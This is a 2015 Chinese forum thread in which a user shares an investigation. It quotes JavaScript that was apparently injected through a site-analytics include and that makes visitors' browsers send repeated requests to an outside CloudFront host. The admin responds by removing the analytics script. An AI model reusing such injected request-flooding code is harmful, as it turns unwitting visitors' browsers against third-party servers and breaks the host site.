Super169 发表于 2015-3-17 20:53:44

请教这里的管理人员, 论坛要阻挡什麽人进入吗?

由於近日连接 geek-workshop 出了点问题, 细心研究了一遍这个网站的源码, 发觉有点奇怪的地方.

在论坛的源码(forum.php)中, 有以下的一段:<script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F5f8d64f479335f9059cacd72ba1019c5' type='text/javascript'%3E%3C/script%3E"));
</script>当中会加入一个http://hm.baidu.com/h.js , 而这个 js 有点奇怪, 在某些地方访问它, 结果会是空白的.
但亦有可能接收到以下的一段 javascript.document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'><\/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'><\/script>");
startime=new Date().getTime();
var count = 0;

function unixtime()
{
      var dt = new Date();
      var ux = Date.UTC(dt.getFullYear(),dt.getMonth(),dt.getDay(),dt.getHours(),dt.getMinutes(),dt.getSeconds())/1000;
      return ux;
}

function get()
{
      var ping;
      $.ajax({
                        url: "http://d3rkfw22xppori.cloudfront.net/_close?t="+unixtime(),
                        dataType: "text",
                        timeout: 10000,
                        cache:true,
                        beforeSend : function()
                        {
                              requestTime = new Date().getTime();
                        },
                        complete : function()
                        {
                              responseTime = new Date().getTime();
                              ping = Math.floor(responseTime-requestTime);                              
                              if(responseTime-startime<300000)
                              {
                                        r_send(ping);
                                        count = count + 1;
                              }
                        }
                });

}

function r_send(ping)
{
      setTimeout("get()", ping);
}
setTimeout("get()", 2000);
如果接收了这段 javascript, 就会不断向http://d3rkfw22xppori.cloudfront.net 发出请求, 结果都是 No 'Access-Control-Allow-Origin'.最後在讨论中的 javasript 都不能正常执行.

看似是为了阻挡某些地方的连结似的, 但 geek-workshop 又不像是要对什麽人封锁, 所以想请教管理员, 是否有什麽原因, 要加入这样的封锁?可否让 geek-workshop 完全开放呢?

弘毅 发表于 2015-3-18 00:27:04

难道是我装了百度站点统计的原因?我把百度站点统计关了看看

弘毅 发表于 2015-3-18 00:31:32

已经把百度统计删了。。。。。不知道还有没有这种问题

幻生幻灭 发表于 2015-3-18 08:28:28

:lol

Super169 发表于 2015-3-18 09:15:39

弘毅 发表于 2015-3-18 00:27 static/image/common/back.gif
难道是我装了百度站点统计的原因?我把百度站点统计关了看看

oh, 原來是為了 統計之用, 如果是為了計算論壇的流量, 而其他人沒問題的話, 我也不想影響大家.其實我自己在 hosts table 中把 hm.baidu.com 指向 localhost 127.0.0.1, 已把問題解決了, 只是想了解一下原因.

另外, 也請問 弘毅大大, 如果你直接打開百度那個 h.js 的連結 http://hm.baidu.com/h.js, 會是空白的, 還是接收到上面那段 javascript?
页: [1]
查看完整版本: 请教这里的管理人员, 论坛要阻挡什麽人进入吗?